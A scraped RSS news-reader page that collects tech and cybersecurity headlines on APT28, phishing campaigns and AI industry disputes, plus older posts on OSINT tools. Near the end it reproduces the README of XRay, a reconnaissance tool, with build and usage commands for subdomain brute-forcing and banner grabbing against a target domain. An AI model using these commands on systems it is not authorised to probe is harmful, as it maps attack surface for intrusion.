News Reader

News Reader

RSS tabs below. Last time of page update: 2026-03-10 11:14:38 GMT+0 Click Here to refresh the page.

START

Select a tab to begin reading.

Tech RSS feeds

Below are tech sites.

Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses

The truth behind performance testing

You can spend months building an app, and have it run like an absolute dream…

The truth behind performance testing on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.

Article link

Date of publish: Sun, 08 Mar 2026 18:53:29 +0000

One Identity Appoints Michael Henricks as Chief Financial and Operating Officer

Alisa Viejo, CA, United States, 25th February 2026, CyberNewswire

One Identity Appoints Michael Henricks as Chief Financial and Operating Officer on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.

Article link

Date of publish: Wed, 25 Feb 2026 14:16:11 +0000

The Next Wave: A Comparative Review of Leading GenAI Testing Tools

GenAI testing tools are now very popular in modern QA strategies when it comes to…

The Next Wave: A Comparative Review of Leading GenAI Testing Tools on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.

Article link

Date of publish: Wed, 25 Feb 2026 08:31:31 +0000

Latest news

Lexar TouchLock Portable SSD review: An iPhone user's dream storage device

The Lexar TouchLock Portable SSD uses the magic of NFC to unlock itself, and fits snuggly on the back of most phones.

Article link

Date of publish: Tue, 10 Mar 2026 11:00:35 GMT

Don't make these 3 common tablet charging mistakes - here's the right way to do it

Your tablet is only as good as its battery - here's how to take better care of it.

Article link

Date of publish: Tue, 10 Mar 2026 10:00:40 GMT

How to preorder the Samsung Galaxy S26 Ultra (and other models) - plus the best deals

The new Galaxy S26 series and the Galaxy Buds 4 arrive this week. It's your last chance to preorder the new devices and get the best deals.

Article link

Date of publish: Tue, 10 Mar 2026 10:00:20 GMT

NYT > Technology

Anthropic Sues Department of Defense Over ‘Supply Chain Risk’ Label

The artificial intelligence company filed two lawsuits against the Department of Defense, saying it was being punished on ideological grounds.

Article link

Date of publish: Mon, 09 Mar 2026 22:12:34 +0000

The Former Coal Miner in the Middle of the A.I. Data Center Boom

Josh Payne, the chief executive of Nscale, raised $2 billion from investors. Sheryl Sandberg, the former Facebook executive, is joining his board.

Article link

Date of publish: Mon, 09 Mar 2026 14:41:41 +0000

‘Designed to Wreak Havoc’: The Cheap Drones Shaping the War With Iran

Iran has launched waves of Shahed drones to menace Persian Gulf nations. The U.S. has unleashed its own copycat on Iran. It’s a sign of how war is changing.

Article link

Date of publish: Sat, 07 Mar 2026 18:35:56 +0000

BleepingComputer

Microsoft to enable Windows hotpatch security updates by default

Microsoft will turn on hotpatch security updates by default for all eligible Windows devices managed through Microsoft Intune and the Microsoft Graph API, beginning with the May 2026 Windows security update. [...]

Article link

Date of publish: Tue, 10 Mar 2026 06:35:33 -0400

APT28 hackers deploy customized variant of Covenant open-source tool

The Russian state-sponsored APT28 threat group is using a custom variant of the open-source Covenant post-exploitation framework for long-term espionage operations. [...]

Article link

Date of publish: Tue, 10 Mar 2026 06:00:00 -0400

Microsoft Teams phishing targets employees with A0Backdoor malware

Hackers contacted employees at financial and healthcare organizations over Microsoft Teams to trick them into granting remote access through Quick Assist and deploy a new piece of malware called A0Backdoor. [...]

Article link

Date of publish: Mon, 09 Mar 2026 18:50:38 -0400

Hackers Online Club (HOC)

Web Coding And Development All-in-One For Dummies ($25.99 Value) FREE for a Limited Time


"Web Coding And Development All-in-One For Dummies ($25.99 Value) FREE for a Limited Time"


Peak the languages that power the web.


With more high-paying web development jobs opening every day, people with coding and web/app building skills are having no problems finding employment.

If you’re a would-be developer looking to gain the know-how to build the interfaces, databases, and other features that run modern websites, web apps, and mobile apps, look no further. Web Coding & Development All-in-One For Dummies is your go-to interpreter for speaking the languages that handle those tasks.

Get started with a refresher on the rules of coding before diving into the languages that build interfaces, add interactivity to the web, or store and deliver data to sites. When you're ready, jump into guidance on how to put it all together to build a site or create an app.

Get the lowdown on coding basics
  • Review HTML and CSS
  • Make sense of JavaScript, jQuery, PHP, and MySQL
  • Create code for web and mobile apps
  • There’s a whole world of opportunity out there for developers—and this fast-track boot camp is here to help you acquire the skills you need to take your career to new heights!

Free offer expires 4/22/2020

Article link

Date of publish: Mon, 20 Apr 2020 06:25:00 +0000

Smart OSINT Collection of Common IOC Types


Smart OSINT Collection of Common IOC (Indicator of compromise) Types


This application is designed to assist security analysts and researchers with the collection and assessment of common IOC types. Accepted IOCs currently include IP addresses, domain names, URLs, and file hashes.

The title of this project is named after Mimir, a figure in Norse mythology renowned for his knowledge and wisdom. This application aims to provide you knowledge into IOCs and then some added "wisdom" by calculating risk scores per IOC, assigning a common malware family name to hash lookups based off of reports from VirusTotal and OPSWAT, and leveraging machine learning tools to determine if an IP, URL, or domain is likely to be malicious.

Base Collection

For network based IOCs, Mimir gathers basic information including:
  • Whois
  • ASN
  • Geolocation
  • Reverse DNS
  • Passive DNS
  • Collection Sources

Some of these sources will require an API key, and occasionally only by getting a paid account and tried to limit reliance on paid services as much as possible.
  • PassiveTotal
  • VirusTotal
  • DomainTools
  • OPSWAT
  • Google SafeBrowsing
  • Shodan
  • PulseDive
  • CSIRTG
  • URLscan
  • HpHosts
  • Blacklist checks
  • Spam blacklist checks
  • Risk Scoring

The risk scoring works best when Mimir can gather a decent amount of data points for an IOC; pDNS, well populated url/domain results (communicating samples, associated samples, recent scan data, etc.) and also takes into account the ML malicious-ness prediction result.

Machine Learning Predictions

The machine learning prediction results come from the CSIRT Gadgets projects csirtg-domainsml-py, csirtg-ipsml-py, csirtg-urlsml-py.

Output

Mimir offers results output in various options including local file reports or exporting the results to an external service.

stdout (console output)
normalizes result data, printed with headers and subheaders per module

JSON file
beautified output to local file

Excel
uses multiple sheets per IOC type

MISP
commit new indicators

ThreatConnect
commit new indicators with confidence and threat ratings (optionally assign tags, a description, and a TLP setting)

Download Smart OSINT Collection

Article link

Date of publish: Fri, 31 Jan 2020 09:39:00 +0000

Cybersecurity- The Beginner's Guide ($29.99 Value) FREE For a Limited Time


"Cybersecurity: The Beginner's Guide ($29.99 Value) FREE For a Limited Time".


Understand the nitty-gritty of Cybersecurity with ease


It's not a secret that there is a huge talent gap in the cybersecurity industry. Everyone is talking about it including the prestigious Forbes Magazine, Tech Republic, CSO Online, DarkReading, and SC Magazine, among many others. Additionally, Fortune CEO's like Satya Nadella, McAfee's CEO Chris Young, Cisco's CIO Colin Seward shine light on it from time to time.

This book put together all the possible information with regards to cybersecurity, why you should choose it, the need for cyber security and how can you be part of it and fill the cybersecurity talent gap bit by bit.

Features include how to:

  • Align your security knowledge with industry leading concepts and tools
  • Acquire required skills and certifications to survive the ever changing market needs
  • Learn from industry experts to analyse, implement, and maintain a robust environment
  • By the end of this book, readers will be well-versed with the security domain and will be capable of making the right choices in the cybersecurity field.


Free offer expires on 17 Dec 2019

Offered Free by: Packt


Article link

Date of publish: Wed, 04 Dec 2019 06:43:00 +0000

Hacker News: Front Page

Yann LeCun's AI startup raises $1B in Europe's largest ever seed round

Article URL: https://www.ft.com/content/e5245ec3-1a58-4eff-ab58-480b6259aaf1

Comments URL: https://news.ycombinator.com/item?id=47321533

Points: 14

# Comments: 4

Article link

Date of publish: Tue, 10 Mar 2026 10:50:30 +0000

OpenClaw Did Not Just Go Viral in China, It Solved a Structural Problem

Article URL: https://hellochinatech.com/p/openclaw-china-ai-stack

Comments URL: https://news.ycombinator.com/item?id=47321494

Points: 7

# Comments: 2

Article link

Date of publish: Tue, 10 Mar 2026 10:44:40 +0000

I'd had several careers but no degree – then I became a palaeontologist at 62

Article URL: https://www.theguardian.com/lifeandstyle/2026/mar/09/a-new-start-after-60-career-palaeontologist

Comments URL: https://news.ycombinator.com/item?id=47321445

Points: 4

# Comments: 0

Article link

Date of publish: Tue, 10 Mar 2026 10:38:39 +0000

Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses

The truth behind performance testing

You can spend months building an app, and have it run like an absolute dream…

The truth behind performance testing on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.

Article link

Date of publish: Sun, 08 Mar 2026 18:53:29 +0000

One Identity Appoints Michael Henricks as Chief Financial and Operating Officer

Alisa Viejo, CA, United States, 25th February 2026, CyberNewswire

One Identity Appoints Michael Henricks as Chief Financial and Operating Officer on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.

Article link

Date of publish: Wed, 25 Feb 2026 14:16:11 +0000

The Next Wave: A Comparative Review of Leading GenAI Testing Tools

GenAI testing tools are now very popular in modern QA strategies when it comes to…

The Next Wave: A Comparative Review of Leading GenAI Testing Tools on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.

Article link

Date of publish: Wed, 25 Feb 2026 08:31:31 +0000

Protecting Your Brand: Why You Need Modern Visual Regression Testing Tools

Visual regression testing is crucial for teams deploying user-facing applications at scale in today’s rapidly changing…

Protecting Your Brand: Why You Need Modern Visual Regression Testing Tools on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.

Article link

Date of publish: Wed, 25 Feb 2026 08:30:40 +0000

Maximize ROI: Strategic Implementation of Gen AI Testing in Your Pipeline

With engineering velocity up, release cycles down, and end-user expectations higher than ever, modern software…

Maximize ROI: Strategic Implementation of Gen AI Testing in Your Pipeline on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.

Article link

Date of publish: Wed, 25 Feb 2026 08:29:07 +0000

Sendmarc Releases DMARCbis Fireside Chat Featuring Co-Editor Todd Herr

Wilmington, North America, 24th February 2026, CyberNewswire

Sendmarc Releases DMARCbis Fireside Chat Featuring Co-Editor Todd Herr on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.

Article link

Date of publish: Tue, 24 Feb 2026 14:48:19 +0000

5 Essential Internet Security Tips Everyone Should Know

The internet can be a scary place. Every day, I hear stories about people getting…

5 Essential Internet Security Tips Everyone Should Know on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.

Article link

Date of publish: Wed, 18 Feb 2026 18:12:38 +0000

CredShields Leads OWASP Smart Contract Top 10 2026 as Governance and Access Failures Drive Onchain Risk
Evaluating 5 Best Security Platforms for Hybrid Cloud Environments

Securing a hybrid cloud environment can be complex. As workloads move to on-premises data centers…

Evaluating 5 Best Security Platforms for Hybrid Cloud Environments on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.

Article link

Date of publish: Mon, 16 Feb 2026 17:13:10 +0000

Top 5 Software Development Companies for Law Firms

Law firms don’t just need “an app.” They need secure, permission-based systems that protect client…

Top 5 Software Development Companies for Law Firms on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.

Article link

Date of publish: Mon, 16 Feb 2026 17:02:53 +0000

Latest news

Lexar TouchLock Portable SSD review: An iPhone user's dream storage device

The Lexar TouchLock Portable SSD uses the magic of NFC to unlock itself, and fits snuggly on the back of most phones.

Article link

Date of publish: Tue, 10 Mar 2026 11:00:35 GMT

Don't make these 3 common tablet charging mistakes - here's the right way to do it

Your tablet is only as good as its battery - here's how to take better care of it.

Article link

Date of publish: Tue, 10 Mar 2026 10:00:40 GMT

How to preorder the Samsung Galaxy S26 Ultra (and other models) - plus the best deals

The new Galaxy S26 series and the Galaxy Buds 4 arrive this week. It's your last chance to preorder the new devices and get the best deals.

Article link

Date of publish: Tue, 10 Mar 2026 10:00:20 GMT

Amazon's Big Spring Sale 2026: Rumored dates, what to expect & everything to know

Amazon's Spring Sale 2026 is coming soon (it's already live in the UK). Here's everything we know so far.

Article link

Date of publish: Tue, 10 Mar 2026 09:00:41 GMT

YouTube Premium vs. YouTube Premium Lite: Are the upgrades worth the $6 difference?

YouTube videos without ads sound great, but you should know about both plans before overpaying for features you don't use.

Article link

Date of publish: Tue, 10 Mar 2026 02:00:44 GMT

I tried GPT-5.4, and most answers were really good - but a few had me concerned

OpenAI claims that GPT-5.4 Thinking can do professional tasks, but I'm not so sure if that's fully accurate.

Article link

Date of publish: Tue, 10 Mar 2026 01:15:45 GMT

Switching to Tor Browser on Android turned out to be more useful than I expected

If you're looking for the safest way to browse on your Android phone, consider the Tor Browser over more popular options.

Article link

Date of publish: Tue, 10 Mar 2026 01:01:03 GMT

The good, bad, and ugly of AI healthcare, according to a doctor who uses AI

There's a right way and a wrong way to use AI for health advice. Consider the technology a springboard for conversations with a medical professional.

Article link

Date of publish: Tue, 10 Mar 2026 01:00:44 GMT

How to qualify for Apple's education discount - including for the $499 MacBook Neo

Apple's budget MacBook Neo just dropped, but if you're an educator or student, you can get one for less than the standard price.

Article link

Date of publish: Tue, 10 Mar 2026 00:41:00 GMT

How I turned my Starlink Mini into the ultimate off-grid internet device - no AC adapter needed

The XTAR-Link MP158 power bank makes using the Starlink Mink without a nearby outlet actually viable.

Article link

Date of publish: Tue, 10 Mar 2026 00:30:40 GMT

AI is supercharging cloud cyberattacks - and third-party software is the most vulnerable

Google's latest threat report warns that third-party tools are now prime targets for attackers - and businesses have just days to keep them secure.

Article link

Date of publish: Tue, 10 Mar 2026 00:00:47 GMT

Shark UV Reveal review: If you took Dyson's laser-vacuuming tech and put it in a robot

The Shark UV Reveal has proven ideal for most hardwood floors and rooms with plenty of obstacles. Plus: It's bagless.

Article link

Date of publish: Mon, 09 Mar 2026 23:45:46 GMT

You can buy last year's LG OLED TV at Best Buy for 50% off - and I highly recommend it

Looking for a more affordable OLED upgrade? The LG B5 at half price is one of the best TV deals right now.

Article link

Date of publish: Mon, 09 Mar 2026 20:52:00 GMT

AT&T will sell you the iPhone 17e for just $6 a month - how to qualify for the deal

Apple's most affordable phone got a refresh with the new iPhone 17e, and you can save big when you preorder at AT&T.

Article link

Date of publish: Mon, 09 Mar 2026 20:47:00 GMT

How to clear your Windows 11 PC cache (and why you shouldn't wait to do it)

Clearing this hidden data will noticeably speed up your computer - here's how to do it.

Article link

Date of publish: Mon, 09 Mar 2026 20:24:00 GMT

3 simple tweaks that have made my headphones last years longer - Sony and Bose included

Are your headphones feeling rusty? Consider these adjustments before upgrading them.

Article link

Date of publish: Mon, 09 Mar 2026 20:08:00 GMT

Sony WF-1000XM6 vs. Apple AirPods Pro 3: I tested both earbuds, and this pair wins

The battle of ecosystems is at the center, but buyers should consider these factors too.

Article link

Date of publish: Mon, 09 Mar 2026 19:31:00 GMT

I compared the 3 best XR display glasses right now - the winner was not the most expensive

Between Viture, RayNeo, and Xreal, polished spatial tracking beats both raw brightness and future promises.

Article link

Date of publish: Mon, 09 Mar 2026 19:16:00 GMT

I wore the world's first HDR10 XR glasses, and they turned me into Bruce Wayne (sort of)

XR glasses are a must-have for on-the-go entertainment and gaming, and the new RayNeo Air 4 Pro provides a compelling experience.

Article link

Date of publish: Mon, 09 Mar 2026 19:12:00 GMT

This new Claude Code Review tool uses AI agents to check your pull requests for bugs - here's how

Each pull request can cost up to $25. Here's why companies might still pay to prevent catastrophic bugs.

Article link

Date of publish: Mon, 09 Mar 2026 19:00:44 GMT

NYT > Technology

Anthropic Sues Department of Defense Over ‘Supply Chain Risk’ Label

The artificial intelligence company filed two lawsuits against the Department of Defense, saying it was being punished on ideological grounds.

Article link

Date of publish: Mon, 09 Mar 2026 22:12:34 +0000

The Former Coal Miner in the Middle of the A.I. Data Center Boom

Josh Payne, the chief executive of Nscale, raised $2 billion from investors. Sheryl Sandberg, the former Facebook executive, is joining his board.

Article link

Date of publish: Mon, 09 Mar 2026 14:41:41 +0000

‘Designed to Wreak Havoc’: The Cheap Drones Shaping the War With Iran

Iran has launched waves of Shahed drones to menace Persian Gulf nations. The U.S. has unleashed its own copycat on Iran. It’s a sign of how war is changing.

Article link

Date of publish: Sat, 07 Mar 2026 18:35:56 +0000

OpenAI’s Fog of War + Betting on Iran + Hard Fork Review of Slop

“The Pentagon and OpenAI are saying to the public, You’re just going to have to trust us. And the public is saying, Well, we don’t.”

Article link

Date of publish: Fri, 06 Mar 2026 12:00:08 +0000

Former Meta A.I. Chief’s Start-Up Is Valued at $3.5 Billion

Advanced Machine Intelligence Labs, founded by Yann LeCun and other ex-Meta researchers, has raised more than $1 billion from investors.

Article link

Date of publish: Tue, 10 Mar 2026 05:00:10 +0000

U.S. Solar Installations Fell in 2025 as Trump Attacked Clean Energy

More solar energy was added to U.S. grids than any other technology, but the amount installed fell by 14 percent, according to a new report.

Article link

Date of publish: Tue, 10 Mar 2026 04:01:04 +0000

For OpenAI and Anthropic, the Competition Is Deeply Personal

A fight over Pentagon contracts shows how the leaders of Silicon Valley’s two most important A.I. start-ups are feuding over the future of the tech industry.

Article link

Date of publish: Sat, 07 Mar 2026 16:58:10 +0000

Anthropic’s and OpenAI’s Dance With the Pentagon: What to Know

Negotiations, threats and amended contracts have left plenty of questions. Here are some answers.

Article link

Date of publish: Sat, 07 Mar 2026 19:36:22 +0000

Are A.I.-Generated Videos Changing How We See Animals?

By manipulating animals to do wonderful things, we may become numb to their real wonder.

Article link

Date of publish: Sat, 07 Mar 2026 10:00:56 +0000

From 2017: Frances Gabe, Creator of the Only Self-Cleaning Home, Dies at 101

Equal parts quixotic dreamer and accomplished visionary, Ms. Gabe made the house do its own scrubbing.

Article link

Date of publish: Fri, 06 Mar 2026 16:52:09 +0000

Pentagon Officially Notifies Anthropic It Is a ‘Supply Chain Risk’

Anthropic has said it will sue the Defense Department over the designation, which could prevent the start-up from doing business with the U.S. government.

Article link

Date of publish: Fri, 06 Mar 2026 01:23:35 +0000

Demand for AI Data Centers Sends Prospectors Hunting for Land and Power

Brian Janous, a former Microsoft executive, and his firm Cloverleaf have become modern-day land men, packaging electricity and land for data centers.

Article link

Date of publish: Thu, 05 Mar 2026 16:30:12 +0000

The Smart Home Never Quite Worked. Now It’s Getting an A.I. Reboot.

Amazon and Google think that artificially intelligent assistants like Alexa+ and Gemini will speed up the process of setting up a smart home, but many problems remain unsolved.

Article link

Date of publish: Thu, 05 Mar 2026 16:30:06 +0000

How $800 Monthly Car Payments Are Hurting Car Sales

Cars have become so expensive that many Americans are putting off or not buying new cars, hurting the auto industry.

Article link

Date of publish: Thu, 05 Mar 2026 21:13:39 +0000

You’ve Never Seen Ants Like This Before

The Antscan database captures the tiny insects’ diversity and shows how the world’s living things could be rendered in three dimensions.

Article link

Date of publish: Thu, 05 Mar 2026 10:03:52 +0000

A Word to the Wise: Don’t Trust A.I. to File Your Taxes

The world’s smartest technology is no match for the U.S. tax code.

Article link

Date of publish: Thu, 05 Mar 2026 10:01:46 +0000

Elon Musk Defends Social Media Posts in Twitter Shareholder Lawsuit

Mr. Musk said he did not expect his posts in the lead-up to his 2022 acquisition of the social media site, now X, to affect the company’s share price.

Article link

Date of publish: Thu, 05 Mar 2026 02:40:25 +0000

Trump Announces A.I. Industry Pledge to Pay for Power

Companies including Google, Microsoft and OpenAI committed to pay for the power plants and grid upgrades needed to run their data centers.

Article link

Date of publish: Wed, 04 Mar 2026 22:25:58 +0000

Lawmakers Question Intel’s Use of Tools From Blacklisted Chinese Firm

A bipartisan group of senators raised national security concerns about the chipmaker, which is now partly owned by taxpayers.

Article link

Date of publish: Wed, 04 Mar 2026 18:12:33 +0000

Ford and G.M. Face a Dilemma as China Excels in Electric Vehicles

General Motors, Ford and other established automakers risk becoming relics if they don’t catch up to Chinese carmakers and technology companies in electric vehicles and self-driving cars.

Article link

Date of publish: Tue, 03 Mar 2026 23:38:36 +0000

BleepingComputer

Microsoft to enable Windows hotpatch security updates by default

Microsoft will turn on hotpatch security updates by default for all eligible Windows devices managed through Microsoft Intune and the Microsoft Graph API, beginning with the May 2026 Windows security update. [...]

Article link

Date of publish: Tue, 10 Mar 2026 06:35:33 -0400

APT28 hackers deploy customized variant of Covenant open-source tool

The Russian state-sponsored APT28 threat group is using a custom variant of the open-source Covenant post-exploitation framework for long-term espionage operations. [...]

Article link

Date of publish: Tue, 10 Mar 2026 06:00:00 -0400

Microsoft Teams phishing targets employees with A0Backdoor malware

Hackers contacted employees at financial and healthcare organizations over Microsoft Teams to trick them into granting remote access through Quick Assist and deploy a new piece of malware called A0Backdoor. [...]

Article link

Date of publish: Mon, 09 Mar 2026 18:50:38 -0400

Google: Cloud attacks exploit flaws more than weak credentials

Hackers are increasingly exploiting newly disclosed vulnerabilities in third-party software to gain initial access to cloud environments, with the window for attacks shrinking from weeks to just days. [...]

Article link

Date of publish: Mon, 09 Mar 2026 17:45:34 -0400

Dutch govt warns of Signal, WhatsApp account hijacking attacks

Russian state-sponsored hackers have been linked to an ongoing Signal and WhatsApp phishing campaign targeting government officials, military personnel, and journalists to gain access to sensitive messages. [...]

Article link

Date of publish: Mon, 09 Mar 2026 17:24:49 -0400

Ericsson US discloses data breach after service provider hack

Ericsson Inc., the U.S. subsidiary of Swedish networking and telecommunications giant Ericsson, says attackers have stolen data belonging to over 15,000 employees and customers after hacking one of its service providers. [...]

Article link

Date of publish: Mon, 09 Mar 2026 15:07:50 -0400

Microsoft Teams will tag third-party bots trying to join meetings

Microsoft says Teams will soon automatically tag third-party bots in lobbies, allowing organizers to control whether they can join meetings. [...]

Article link

Date of publish: Mon, 09 Mar 2026 13:12:49 -0400

ShinyHunters claims ongoing Salesforce Aura data theft attacks

Salesforce is warning customers that hackers are targeting websites with misconfigured Experience Cloud platforms that give guest users access to more data than intended. However, the ShinyHunters extortion gang claims to be actively exploiting a new bug to steal data from instances. [...]

Article link

Date of publish: Mon, 09 Mar 2026 13:12:22 -0400

FBI warns of phishing attacks impersonating US city, county officials

The Federal Bureau of Investigation (FBI) warns that criminals are impersonating U.S. officials in phishing attacks targeting businesses and individuals who request city and county planning and zoning permits. [...]

Article link

Date of publish: Mon, 09 Mar 2026 11:30:50 -0400

Why Password Audits Miss the Accounts Attackers Actually Want

Password audits often focus on complexity rules but miss the accounts attackers actually target. Specops Software explains how breached passwords, orphaned users, and service accounts can leave organizations exposed. [...]

Article link

Date of publish: Mon, 09 Mar 2026 10:10:20 -0400

Microsoft still working to fix Windows Explorer white flashes

Microsoft has confirmed that it's still working to fully address a known issue that causes bright white flashes when opening the File Explorer on some Windows 11 systems. [...]

Article link

Date of publish: Mon, 09 Mar 2026 10:10:17 -0400

EU court adviser says banks must immediately refund phishing victims

Athanasios Rantos, the Advocate General of the Court of Justice of the EU (CJEU), has issued a formal opinion suggesting that banks must immediately refund account holders affected by unauthorized transactions, even when it's their fault. [...]

Article link

Date of publish: Sun, 08 Mar 2026 11:25:37 -0400

Hackers abuse .arpa DNS and ipv6 to evade phishing defenses

Threat actors are abusing the special-use ".arpa" domain and IPv6 reverse DNS in phishing campaigns that more easily evade domain reputation checks and email security gateways. [...]

Article link

Date of publish: Sun, 08 Mar 2026 10:12:22 -0400

Termite ransomware breaches linked to ClickFix CastleRAT attacks

Ransomware threat actors tracked as Velvet Tempest are using the ClickFix technique and legitimate Windows utilities to deploy the DonutLoader malware and the CastleRAT backdoor. [...]

Article link

Date of publish: Sat, 07 Mar 2026 11:14:32 -0500

Microsoft: Hackers abusing AI at every stage of cyberattacks

Microsoft says threat actors are increasingly using artificial intelligence in their operations to accelerate attacks, scale malicious activity, and lower technical barriers across all aspects of a cyberattack. [...]

Article link

Date of publish: Sat, 07 Mar 2026 10:15:25 -0500

Hackers Online Club (HOC)

Web Coding And Development All-in-One For Dummies ($25.99 Value) FREE for a Limited Time


"Web Coding And Development All-in-One For Dummies ($25.99 Value) FREE for a Limited Time"


Peak the languages that power the web.


With more high-paying web development jobs opening every day, people with coding and web/app building skills are having no problems finding employment.

If you’re a would-be developer looking to gain the know-how to build the interfaces, databases, and other features that run modern websites, web apps, and mobile apps, look no further. Web Coding & Development All-in-One For Dummies is your go-to interpreter for speaking the languages that handle those tasks.

Get started with a refresher on the rules of coding before diving into the languages that build interfaces, add interactivity to the web, or store and deliver data to sites. When you're ready, jump into guidance on how to put it all together to build a site or create an app.

Get the lowdown on coding basics
  • Review HTML and CSS
  • Make sense of JavaScript, jQuery, PHP, and MySQL
  • Create code for web and mobile apps
  • There’s a whole world of opportunity out there for developers—and this fast-track boot camp is here to help you acquire the skills you need to take your career to new heights!

Free offer expires 4/22/2020

Article link

Date of publish: Mon, 20 Apr 2020 06:25:00 +0000

Smart OSINT Collection of Common IOC Types


Smart OSINT Collection of Common IOC (Indicator of compromise) Types


This application is designed to assist security analysts and researchers with the collection and assessment of common IOC types. Accepted IOCs currently include IP addresses, domain names, URLs, and file hashes.

The title of this project is named after Mimir, a figure in Norse mythology renowned for his knowledge and wisdom. This application aims to provide you knowledge into IOCs and then some added "wisdom" by calculating risk scores per IOC, assigning a common malware family name to hash lookups based off of reports from VirusTotal and OPSWAT, and leveraging machine learning tools to determine if an IP, URL, or domain is likely to be malicious.

Base Collection

For network based IOCs, Mimir gathers basic information including:
  • Whois
  • ASN
  • Geolocation
  • Reverse DNS
  • Passive DNS
  • Collection Sources

Some of these sources will require an API key, and occasionally only by getting a paid account and tried to limit reliance on paid services as much as possible.
  • PassiveTotal
  • VirusTotal
  • DomainTools
  • OPSWAT
  • Google SafeBrowsing
  • Shodan
  • PulseDive
  • CSIRTG
  • URLscan
  • HpHosts
  • Blacklist checks
  • Spam blacklist checks
  • Risk Scoring

The risk scoring works best when Mimir can gather a decent amount of data points for an IOC; pDNS, well populated url/domain results (communicating samples, associated samples, recent scan data, etc.) and also takes into account the ML malicious-ness prediction result.

Machine Learning Predictions

The machine learning prediction results come from the CSIRT Gadgets projects csirtg-domainsml-py, csirtg-ipsml-py, csirtg-urlsml-py.

Output

Mimir offers results output in various options including local file reports or exporting the results to an external service.

stdout (console output)
normalizes result data, printed with headers and subheaders per module

JSON file
beautified output to local file

Excel
uses multiple sheets per IOC type

MISP
commit new indicators

ThreatConnect
commit new indicators with confidence and threat ratings (optionally assign tags, a description, and a TLP setting)

Download Smart OSINT Collection

Article link

Date of publish: Fri, 31 Jan 2020 09:39:00 +0000

Cybersecurity- The Beginner's Guide ($29.99 Value) FREE For a Limited Time


"Cybersecurity: The Beginner's Guide ($29.99 Value) FREE For a Limited Time".


Understand the nitty-gritty of Cybersecurity with ease


It's not a secret that there is a huge talent gap in the cybersecurity industry. Everyone is talking about it including the prestigious Forbes Magazine, Tech Republic, CSO Online, DarkReading, and SC Magazine, among many others. Additionally, Fortune CEO's like Satya Nadella, McAfee's CEO Chris Young, Cisco's CIO Colin Seward shine light on it from time to time.

This book put together all the possible information with regards to cybersecurity, why you should choose it, the need for cyber security and how can you be part of it and fill the cybersecurity talent gap bit by bit.

Features include how to:

  • Align your security knowledge with industry leading concepts and tools
  • Acquire required skills and certifications to survive the ever changing market needs
  • Learn from industry experts to analyse, implement, and maintain a robust environment
  • By the end of this book, readers will be well-versed with the security domain and will be capable of making the right choices in the cybersecurity field.


Free offer expires on 17 Dec 2019

Offered Free by: Packt


Article link

Date of publish: Wed, 04 Dec 2019 06:43:00 +0000

Best Practices For Protecting Against Phishing, Ransomware and Email Fraud


"Best Practices for Protecting Against Phishing, Ransomware and Email Fraud"


Osterman Research conducted a survey among corporate decisions makers in early 2018 and found that nearly 28% of those organizations had experienced a phishing attack that was successful in infecting their networks with malware.

Over 17% of organizations had email as part of a CEO Fraud/BEC attack that successfully tricked one or more of their senior executives in the last 12 months. Don’t let this happen to your organization.

Download the Osterman Research Whitepaper, Best Practices for Protecting Against Phishing, Ransomware and Email Fraud, and learn ten best practices you should consider to better protect your systems and network, train your users to be security-aware, and safeguard your organization’s sensitive and confidential data from phishing attacks, ransomware, and CEO Fraud.

Article link

Date of publish: Mon, 25 Nov 2019 07:46:00 +0000

XRay - Using For Recon Mapping And OSINT Suite


XRay is a software for recon, mapping and OSINT gathering from public networks.

XRay for network OSINT gathering, its goal is to make some of the initial tasks of information gathering and network mapping automatic.

How Does it Work?

XRay is a very simple tool, it works this way:
  1. It'll bruteforce subdomains using a wordlist and DNS requests.
  2. For every subdomain/ip found, it'll use Shodan to gather open ports and other intel.
  3. If a ViewDNS API key is provided, for every subdomain historical data will be collected.
  4. For every unique IP address, and for every open port, it'll launch specific banner grabbers and info collectors.
  5. Eventually the data is presented to the user on the web ui.

Grabbers and Collectors

  • HTTP Server, X-Powered-By and Location headers.
  • HTTP and HTTPS robots.txt disallowed entries.
  • HTTPS certificates chain ( with recursive subdomain grabbing from CN and Alt Names ).
  • HTML title tag.
  • DNS version.bind. and hostname.bind. records.
  • MySQL, SMTP, FTP, SSH, POP and IRC banners.

Notes

Shodan API Key

The shodan.io API key parameter ( -shodan-key KEY ) is optional, however if not specified, no service fingerprinting will be performed and a lot less information will be shown (basically it just gonna be DNS subdomain enumeration).

ViewDNS API Key

If a ViewDNS API key parameter ( -viewdns-key KEY ) is passed, domain historical data will also be retrieved.

Anonymity and Legal Issues

The software will rely on your main DNS resolver in order to enumerate subdomains, also, several connections might be directly established from your host to the computers of the network you're scanning in order to grab banners from open ports. Technically, you're just connecting to public addresses with open ports (and there's no port scanning involved, as such information is grabbed indirectly using Shodan API), but you know, someone might not like such behaviour.

Building a Docker image

To build a Docker image with the latest version of XRay:

git clone https://github.com/evilsocket/xray.git
cd xray
docker build -t xraydocker .

Once built, XRay can be started within a Docker container using the following:

docker run --rm -it -p 8080:8080 xraydocker xray -address 0.0.0.0 -shodan-key shodan_key_here -domain example.com 

Manual Compilation

Make sure you are using Go >= 1.7, that your installation is working properly, that you have set the $GOPATH variable and you have appended $GOPATH/bin to your $PATH.

Then:

go get github.com/evilsocket/xray
cd $GOPATH/src/github.com/evilsocket/xray/
make

You'll find the executable in the build folder.

Usage

Usage: xray -shodan-key YOUR_SHODAN_API_KEY -domain TARGET_DOMAIN

Options:
  -address string
        IP address to bind the web ui server to. (default "127.0.0.1")
  -consumers int
        Number of concurrent consumers to use for subdomain enumeration. (default 16)
  -domain string
        Base domain to start enumeration from.
  -port int
        TCP port to bind the web ui server to. (default 8080)
  -preserve-domain
        Do not remove subdomain from the provided domain name.
